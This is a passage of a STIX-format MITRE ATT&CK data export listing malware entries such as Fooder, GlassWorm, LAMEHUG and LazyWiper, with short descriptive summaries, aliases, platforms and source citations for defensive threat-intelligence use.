                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--7c8865dc-1bf9-49ce-b5f2-f15abde0909a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 21:28:28.895000+00:00",
                    "modified": "2026-04-23 03:31:09.302000+00:00",
                    "name": "Fooder",
                    "description": "[Fooder](https://attack.mitre.org/software/S9033) is a custom 64-bit C/C++ loader used by [MuddyWater](https://attack.mitre.org/groups/G0069) that can decrypt and reflectively load embedded payloads such as a\u202fgo-socks5 proxy\u202futility, the\u202fopen-source\u202fHackBrowserData\u202finfostealer, or\u202fthe\u202f[MuddyViper](https://attack.mitre.org/software/S9032)\u202fbackdoor. [Fooder](https://attack.mitre.org/software/S9033) has frequently\u202fmasqueraded as\u202fan entertainment executable, such as\u202fthe Snake game (e.g., `Snake_Game.exe`).(Citation: ESET_MuddyWater_Dec2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9033",
                            "external_id": "S9033"
                        },
                        {
                            "source_name": "ESET_MuddyWater_Dec2025",
                            "description": "ESET Research. (2025, December 2). MuddyWater: Snakes by the riverbank. Retrieved February 17, 2026.",
                            "url": "https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Fooder"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--809bc57b-4d4c-43de-b698-448334ed8185",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-10 16:59:14.138000+00:00",
                    "modified": "2026-04-24 02:39:02.116000+00:00",
                    "name": "GlassWorm",
                    "description": "[GlassWorm](https://attack.mitre.org/software/S9010) is a worm that propagated through supply chain attacks by compromising repository credentials from victim environments and having malicious payloads added to those compromised accounts for distribution to victims across the various development ecosystems.(Citation: Koi Glassworm InvisibleCode October 2025)(Citation: Aikido GlassWorm October 2025)(Citation: Socket GlassWorm January 2026)   [GlassWorm](https://attack.mitre.org/software/S9010) has numerous variants, including Rust binaries, encrypted JavaScript and a variant leveraging invisible Unicode characters that made reverse engineering difficult.(Citation: Koi Glassworm New Tricks December 2025)(Citation: Koi Glassworm InvisibleCode October 2025)(Citation: Koi GlassWorm Rust December 2025)  [GlassWorm](https://attack.mitre.org/software/S9010) has employed a unique command and control (C2) methodology using Solana blockchain.(Citation: Koi Glassworm Extensions November 2025)(Citation: Koi Glassworm InvisibleCode October 2025)   [GlassWorm](https://attack.mitre.org/software/S9010) was first reported in October 2025.(Citation: Koi Glassworm Extensions November 2025)(Citation: Koi Glassworm InvisibleCode October 2025)(Citation: Socket GlassWorm January 2026)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9010",
                            "external_id": "S9010"
                        },
                        {
                            "source_name": "Koi Glassworm New Tricks December 2025",
                            "description": "Gal Hachamov. (2025, December 29). GlassWorm Goes Mac: Fresh Infrastructure, New Tricks. Retrieved April 10, 2026.",
                            "url": "https://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks"
                        },
                        {
                            "source_name": "Koi Glassworm Extensions November 2025",
                            "description": "Idan Dardikman, Yuval Ronen, Lotan Sery. (2025, November 6). GlassWorm Returns: New Wave Strikes as We Expose Attacker Infrastructure. Retrieved April 10, 2026.",
                            "url": "https://www.koi.ai/blog/glassworm-returns-new-wave-openvsx-malware-expose-attacker-infrastructure"
                        },
                        {
                            "source_name": "Koi Glassworm InvisibleCode October 2025",
                            "description": "Idan Dardikman. (2025, October 18). GlassWorm: First Self-Propagating Worm Using Invisible Code Hits OpenVSX Marketplace. Retrieved April 10, 2026.",
                            "url": "https://www.koi.ai/blog/glassworm-first-self-propagating-worm-using-invisible-code-hits-openvsx-marketplace"
                        },
                        {
                            "source_name": "Aikido GlassWorm October 2025",
                            "description": "Ilyas Makari. (2025, October 31). The Return of the Invisible Threat: Hidden PUA Unicode Hits GitHub repositorties. Retrieved April 10, 2026.",
                            "url": "https://www.aikido.dev/blog/the-return-of-the-invisible-threat-hidden-pua-unicode-hits-github-repositorties"
                        },
                        {
                            "source_name": "Socket GlassWorm January 2026",
                            "description": "Kirill Boychenko. (2026, January 31). GlassWorm Loader Hits Open VSX via Developer Account Compromise. Retrieved April 10, 2026.",
                            "url": "https://socket.dev/blog/glassworm-loader-hits-open-vsx-via-suspected-developer-account-compromise"
                        },
                        {
                            "source_name": "Koi GlassWorm Rust December 2025",
                            "description": "Lotan Sery. (2025, December 10). GlassWorm Goes Native: Same Infrastructure, Hardened Delivery. Retrieved April 10, 2026.",
                            "url": "https://www.koi.ai/blog/glassworm-goes-native-same-infrastructure-hardened-delivery"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "GlassWorm"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--52b52f72-88e6-4847-88d6-da3b9e4a4f71",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-08 15:49:02.020000+00:00",
                    "modified": "2026-04-23 02:33:46.681000+00:00",
                    "name": "HTTPTroy",
                    "description": "[HTTPTroy](https://attack.mitre.org/software/S9007) is a highly obfuscated backdoor that facilitates collection, command and control, defense evasion and exfiltration.  [HTTPTroy](https://attack.mitre.org/software/S9007) was first reported in October 2025. [HTTPTroy](https://attack.mitre.org/software/S9007) has been observed in operations attributed to DPRK-affiliated threat actors, including [Kimsuky](https://attack.mitre.org/groups/G0094).  [HTTPTroy](https://attack.mitre.org/software/S9007) has been delivered to victims through a separate loader leveraged by [Kimsuky](https://attack.mitre.org/groups/G0094).(Citation: Gen Digital Kimsuky HTTPTroy October 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9007",
                            "external_id": "S9007"
                        },
                        {
                            "source_name": "Gen Digital Kimsuky HTTPTroy October 2025",
                            "description": "Alexndru-Cristian Bardas. (2025, October 30). DPRK\u2019s Playbook: Kimsuky\u2019s HttpTroy and Lazarus\u2019s New BLINDINGCAN Variant. Retrieved April 8, 2026.",
                            "url": "https://www.gendigital.com/blog/insights/research/dprk-kimsuky-lazarus-analysis"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "HTTPTroy"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--148f947c-aabd-4ba8-b6a3-22b296855119",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 20:45:04.154000+00:00",
                    "modified": "2026-04-23 03:34:30.999000+00:00",
                    "name": "HeartCrypt",
                    "description": "[HeartCrypt](https://attack.mitre.org/software/S9018) is a packer-as-a-service (PaaS) used to protect malware that has been available since at least 2024. [HeartCrypt](https://attack.mitre.org/software/S9018) has been used to pack a variety of malware including [Lumma Stealer](https://attack.mitre.org/software/S1213), [Remcos](https://attack.mitre.org/software/S0332), and Rhadamanthys. In the [HeartCrypt](https://attack.mitre.org/software/S9018) PaaS model, customers submit malware via private messaging services and it is then packed and returned by the operator as a new binary.(Citation: Palo Alto HeartCrypt DEC 2024)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9018",
                            "external_id": "S9018"
                        },
                        {
                            "source_name": "Palo Alto HeartCrypt DEC 2024",
                            "description": "Tujague, J., Bunce, D. (n.d.). Crypted Hearts: Exposing the HeartCrypt Packer-as-a-Service Operation. Retrieved April 16, 2026.",
                            "url": "https://unit42.paloaltonetworks.com/packer-as-a-service-heartcrypt-malware/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "HeartCrypt"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--9edc41d1-a13d-4acf-b400-d47fb2f6809d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-17 17:12:08.208000+00:00",
                    "modified": "2026-04-24 02:31:26.041000+00:00",
                    "name": "HiddenFace",
                    "description": "[HiddenFace](https://attack.mitre.org/software/S9023) is a modular backdoor developed and used exclusively by [MirrorFace](https://attack.mitre.org/groups/G1054) since at least 2021. [HiddenFace](https://attack.mitre.org/software/S9023) can communicate both actively and passively and has been used against political and academic targets.(Citation: JPCERT MirrorFace JUL 2024)(Citation: Trend Micro Earth Kasha NOV 2024)(Citation: Trend Micro Earth Kasha Updates APR 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9023",
                            "external_id": "S9023"
                        },
                        {
                            "source_name": "NOOPDOOR",
                            "description": "(Citation: ESET HiddenFace 2024)(Citation: Trend Micro Earth Kasha NOV 2024)(Citation: Trend Micro Earth Kasha Updates APR 2025)"
                        },
                        {
                            "source_name": "ESET HiddenFace 2024",
                            "description": "Breitenbacher, D. (2024). Unmasking HiddenFace. Retrieved April 17, 2026.",
                            "url": "https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_2_8_Breitenbacher_en.pdf"
                        },
                        {
                            "source_name": "Trend Micro Earth Kasha Updates APR 2025",
                            "description": "Hiroaki, H. (2025, April 30). Earth Kasha Updates TTPs in Latest Campaign Targeting Taiwan and Japan. Retrieved April 17, 2026.",
                            "url": "https://www.trendmicro.com/en_us/research/25/d/earth-kasha-updates-ttps.html"
                        },
                        {
                            "source_name": "JPCERT MirrorFace JUL 2024",
                            "description": "Tomonaga, S. (2024, July 16). MirrorFace Attack against Japanese Organisations. Retrieved April 17, 2026.",
                            "url": "https://blogs.jpcert.or.jp/en/2024/07/mirrorface-attack-against-japanese-organisations.html"
                        },
                        {
                            "source_name": "Trend Micro Earth Kasha NOV 2024",
                            "description": "Trend Micro. (2024, November 19). Spot the Difference: Earth Kasha's New LODEINFO Campaign And The Correlation Analysis With The APT10 Umbrella. Retrieved April 17, 2026.",
                            "url": "https://www.trendmicro.com/en_us/research/24/k/lodeinfo-campaign-of-earth-kasha.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "HiddenFace",
                        "NOOPDOOR"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dominik Breitenbacher, ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--089aa00a-99ac-46b4-9cf8-4224d463566d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 12:42:31.383000+00:00",
                    "modified": "2026-04-22 00:32:35.569000+00:00",
                    "name": "IronWind",
                    "description": "[IronWind](https://attack.mitre.org/software/S9029) is a custom loader malware that has been in use since at least 2023 by actors including [WIRTE](https://attack.mitre.org/groups/G0090) to target entities in the Middle East.(Citation: Check Point Wirte NOV 2024)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9029",
                            "external_id": "S9029"
                        },
                        {
                            "source_name": "Check Point Wirte NOV 2024",
                            "description": "Check Point. (2024, November 12). Hamas-affiliated Threat Actor WIRTE Continues its Middle East Operations and Moves to Disruptive Activity. Retrieved April 20, 2026.",
                            "url": "https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "IronWind"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--c55e0410-842d-4365-a2c8-26c0330f85b8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-21 12:07:59.044000+00:00",
                    "modified": "2026-04-23 23:56:18.785000+00:00",
                    "name": "LAMEHUG",
                    "description": "[LAMEHUG](https://attack.mitre.org/software/S9035) is Python-based information stealer first identified in July 2025 by Ukraine's Computer Emergency Response Team (CERT-UA) in phishing emails targeting Ukrainian government officials. [LAMEHUG](https://attack.mitre.org/software/S9035) is the first known malware to integrate artificial intelligence (AI) directly into its attack workflow by querying large language models (LLMs) hosted on Hugging Face to dynamically generate reconnaissance, data theft, and system manipulation commands in real time.  [LAMEHUG](https://attack.mitre.org/software/S9035) has been attributed to [APT28](https://attack.mitre.org/groups/G0007). (Citation: Splunk LAMEHUG SEP 2025)(Citation: Nov AI Threat Tracker)(Citation: Cato LAMEHUG JUL 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9035",
                            "external_id": "S9035"
                        },
                        {
                            "source_name": "PROMPTSTEAL",
                            "description": "(Citation: Nov AI Threat Tracker)"
                        },
                        {
                            "source_name": "Splunk LAMEHUG SEP 2025",
                            "description": "Conteras, T., Splunk Research Team. (2025, September 25). From Prompt to Payload: LAMEHUG\u2019s LLM-Driven Cyber Intrusion. Retrieved April 21, 2026.",
                            "url": "https://www.splunk.com/en_us/blog/security/lamehug-ai-driven-malware-llm-cyber-intrusion-analysis.html"
                        },
                        {
                            "source_name": "Nov AI Threat Tracker",
                            "description": "Google Threat Intelligence Group. (2025, November 5). GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools. Retrieved March 31, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"
                        },
                        {
                            "source_name": "Cato LAMEHUG JUL 2025",
                            "description": "Simonovich, V. (2025, July 23). Cato CTRL\u2122 Threat Research: Analyzing LAMEHUG \u2013 First Known LLM-Powered Malware with Links to APT28 (Fancy Bear) . Retrieved April 21, 2026.",
                            "url": "https://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "LAMEHUG",
                        "PROMPTSTEAL"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--7908f855-5b5b-4d6a-acbc-af6b45ec27ad",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-17 14:45:26.266000+00:00",
                    "modified": "2026-04-24 02:29:49.185000+00:00",
                    "name": "LODEINFO",
                    "description": "[LODEINFO](https://attack.mitre.org/software/S9020) is a fileless backdoor malware first identified in 2020 that has been used by actors including [MirrorFace](https://attack.mitre.org/groups/G1054), primarily against media, diplomatic, governmental, and public sector organizations in Japan.(Citation: Kaspersky LODEINFO OCT 2022)(Citation: ITOCHU LODEINFO JAN 2024)(Citation: ESET MirrorFace DEC 2022)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9020",
                            "external_id": "S9020"
                        },
                        {
                            "source_name": "ESET MirrorFace DEC 2022",
                            "description": "Breitenbacher, D. (2022, December 14). Unmasking MirrorFace: Operation LiberalFace targeting Japanese political entities. Retrieved April 17, 2026.",
                            "url": "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/"
                        },
                        {
                            "source_name": "Kaspersky LODEINFO OCT 2022",
                            "description": "Ishimaru, S. (2022, October 31). APT10: Tracking down LODEINFO 2022, part I. Retrieved April 17, 2026.",
                            "url": "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/"
                        },
                        {
                            "source_name": "ITOCHU LODEINFO JAN 2024",
                            "description": "ITOCHU. (2024, January 24). The Endless Struggle Against APT10: Insights from LODEINFO v0.6.6 - v0.7.3 Analysis. Retrieved April 17, 2026.",
                            "url": "https://blog-en.itochuci.co.jp/entry/2024/01/24/134100"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "LODEINFO"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dominik Breitenbacher, ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--7fbf1f1e-cbd8-4060-8e3b-7ca0e56ce3fe",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-21 14:43:14.412000+00:00",
                    "modified": "2026-04-23 03:29:27.045000+00:00",
                    "name": "LP-Notes",
                    "description": "[LP-Notes](https://attack.mitre.org/software/S9036) is a C/C++ Windows credential stealer used by [MuddyWater](https://attack.mitre.org/groups/G0069). [LP-Notes](https://attack.mitre.org/software/S9036) was named after the `lp-notes.txt` file that is used to store stolen credentials.(Citation: ESET_MuddyWater_Dec2025)  ",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9036",
                            "external_id": "S9036"
                        },
                        {
                            "source_name": "ESET_MuddyWater_Dec2025",
                            "description": "ESET Research. (2025, December 2). MuddyWater: Snakes by the riverbank. Retrieved February 17, 2026.",
                            "url": "https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "LP-Notes"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--e4160979-b9bc-4f58-acbe-1d921ebbc122",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 22:31:11.070000+00:00",
                    "modified": "2026-04-23 15:08:43.762000+00:00",
                    "name": "LazyWiper",
                    "description": "[LazyWiper](https://attack.mitre.org/software/S9039) is a destructive malware observed targeting a manufacturing sector company during the [2025 Poland Wiper Attacks](https://attack.mitre.org/campaigns/C0063). [LazyWiper](https://attack.mitre.org/software/S9039) is a native Windows PowerShell script that is believed to have been generated by a large language model (LLM). [LazyWiper](https://attack.mitre.org/software/S9039) overwrites files on the system using the C# function `WriteRandomBytes()` and can targets multiple specific file types by their extensions.(Citation: CERT Polska)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9039",
                            "external_id": "S9039"
                        },
                        {
                            "source_name": "CERT Polska",
                            "description": "CERT Polska. (2026, January 30). Energy Sector Incident  Report \u2013 29 December. Retrieved April 22, 2026.",
                            "url": "https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "LazyWiper"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--2f851d4a-18cc-4d7f-9408-b10ef02ee936",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-17 16:54:17.773000+00:00",
                    "modified": "2026-04-24 02:32:16.653000+00:00",
                    "name": "MirrorStealer",
                    "description": "[MirrorStealer](https://attack.mitre.org/software/S9022) is a credential stealer that has been used by [MirrorFace](https://attack.mitre.org/groups/G1054) since at least 2022 to steal credentials from various applications, including browsers and email clients. [MirrorStealer](https://attack.mitre.org/software/S9022) has been delivered directly into system memory via commands issued by [LODEINFO](https://attack.mitre.org/software/S9020).(Citation: ESET MirrorFace DEC 2022)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9022",
                            "external_id": "S9022"
                        },
                        {
                            "source_name": "ESET MirrorFace DEC 2022",
                            "description": "Breitenbacher, D. (2022, December 14). Unmasking MirrorFace: Operation LiberalFace targeting Japanese political entities. Retrieved April 17, 2026.",
                            "url": "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "MirrorStealer"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dominik Breitenbacher, ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--7b92e996-b535-4159-be16-3c3aee4edf54",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 17:41:52.695000+00:00",
                    "modified": "2026-04-23 03:31:49.616000+00:00",
                    "name": "MuddyViper",
                    "description": "[MuddyViper](https://attack.mitre.org/software/S9032) is custom\u202fbackdoor\u202fwritten in C and C++\u202fused by [MuddyWater](https://attack.mitre.org/groups/G0069) for\u202fcommand and control (C2) communications\u202fand persistence.\u202f[MuddyViper](https://attack.mitre.org/software/S9032) is loaded by [Fooder](https://attack.mitre.org/software/S9033)\u202fand sends frequent messages to the C2 server.(Citation: ESET_MuddyWater_Dec2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9032",
                            "external_id": "S9032"
                        },
                        {
                            "source_name": "ESET_MuddyWater_Dec2025",
                            "description": "ESET Research. (2025, December 2). MuddyWater: Snakes by the riverbank. Retrieved February 17, 2026.",
                            "url": "https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "MuddyViper"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--66637cd6-ae68-4bcd-af82-32f70a854175",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-17 18:35:44.528000+00:00",
                    "modified": "2026-04-22 23:22:17.808000+00:00",
                    "name": "NOOPLDR",
                    "description": "[NOOPLDR](https://attack.mitre.org/software/S9025) is a shellcode loader with XML/C# and DLL versions that has been used by [MirrorFace](https://attack.mitre.org/groups/G1054) to load [HiddenFace](https://attack.mitre.org/software/S9023).(Citation: Trend Micro Earth Kasha NOV 2024)\n",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9025",
                            "external_id": "S9025"
                        },
                        {
                            "source_name": "Trend Micro Earth Kasha NOV 2024",
                            "description": "Trend Micro. (2024, November 19). Spot the Difference: Earth Kasha's New LODEINFO Campaign And The Correlation Analysis With The APT10 Umbrella. Retrieved April 17, 2026.",
                            "url": "https://www.trendmicro.com/en_us/research/24/k/lodeinfo-campaign-of-earth-kasha.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "NOOPLDR"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dominik Breitenbacher, ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--ca3f5123-b853-45ef-83cb-1d1bca22e03f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 13:59:06.123000+00:00",
                    "modified": "2026-04-23 02:56:02.086000+00:00",
                    "name": "PHASEJAM",
                    "description": "[PHASEJAM](https://attack.mitre.org/software/S9014) is a dropper written as a bash shell script that modifies Ivanti Connect Secure appliance components. [PHASEJAM](https://attack.mitre.org/software/S9014) was first reported in January 2025. [PHASEJAM](https://attack.mitre.org/software/S9014) has previously been leveraged by People's Republic of China (PRC)- affiliated actors identified as UNC5221 and SYLVANITE.(Citation: Dragos SYLVANITE MuddyWater Electrum March 2026)(Citation: Google UNC5221 Ivanti January 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9014",
                            "external_id": "S9014"
                        },
                        {
                            "source_name": "Dragos SYLVANITE MuddyWater Electrum March 2026",
                            "description": "Dragos. (2026, March 24). Dragos 2026 OT Cybersecurity Report: Year in Review, O&G and Petrochemicals Focus. Retrieved April 17, 2026.",
                            "url": "https://hub.dragos.com/hubfs/2026_YIR_ExecutiveBriefing%20O_G.pdf?hsLang=en"
                        },
                        {
                            "source_name": "Google UNC5221 Ivanti January 2025",
